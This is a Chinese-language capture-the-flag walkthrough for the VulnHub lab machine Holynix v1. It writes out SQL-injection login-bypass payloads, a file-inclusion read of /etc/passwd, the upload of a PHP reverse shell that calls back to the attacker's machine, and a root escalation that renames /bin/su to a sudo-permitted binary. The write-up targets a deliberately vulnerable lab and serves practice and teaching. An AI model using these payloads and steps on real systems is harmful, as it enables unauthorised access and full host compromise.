下载地址: Holynix: v1 ~ VulnHub
设置mac 为: 00:0c:29:bc:05:de
主机发现:
arp-scan -l
netdiscover
端口扫描
nmap -sV -sC -sT 192.168.215.197 -p-
发现开启了80和12端口
访问网址:
点击login
发现登录框可以想到弱口令登录,sql注入,xss漏洞,
尝试单引号闭合 admin' password' 后进入这个sql报错页面可以尝试 sql注入漏洞
发现 , 账户用 \' 进行转义 ,密码没有 ,所有账户随便,密码用万能密码进行登录
#万能密码(注意空格也是密码):
' or 1=1 #
登录成功:
发现提示 alamo 应该就是用户
点击 Directory 发现 url页面是 page=某.php , 可以尝试文件包含漏洞进行敏感信息读取
发现读取不了报错
点击upload发现可以上传文件可以尝试文件上传漏洞
上传1.php木马文件发现禁止alamo用户主目录上传
所以alamo的权限不行
只能查看其他页面有没有文件包含之类的漏洞
更改读取的文件为/etc/passwd
成功读取到敏感信息
发现其他用户,可以登录其他用户是否有更高的权限
etenenbaum
' or username='etenenbaum' #
查询逻辑
SELECT * FROM accounts WHERE username='etenenbaum' AND password='' or username='etenenbaum' #'
成功登录
反弹shell
在kali构造反弹shell
locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .
vim php-reverse-shell.php
编辑 shell.php ip 是kali
tar czf shell.tar.gz php-reverse-shell.php # 压缩
上传 shell.tar.gz 记着勾选小框
在~etenenbaum这个目录找到我们上传的 压缩包,它会自动解压为 .php
点击成功反弹到shell
提权
用python提高交互性
python -c "import pty;pty.spawn('/bin/bash')"
查看当前的权限
sudo -l
可知,我们可以免密用sudo执行chown chgrp tar mv这几个命令。那么结合mv可以给文件改名的特点,我们只要选择chown chgrp tar三个指令中的任意一个(这里以tar为例)改名为其他名字(tar.orgi),然后再把用于提权的su命令改名为这三个中的一个(tar),然后运行sudo 指令(sudo tar)即可提权
sudo mv /bin/tar /bin/tar.orgi
sudo mv /bin/su /bin/tar
sudo tar
运行sudo tar 相当于运行 sudo su , 由于su 被我们改名为 tar ,然后tar 又可以被我们 sudo 免密运行
提权成功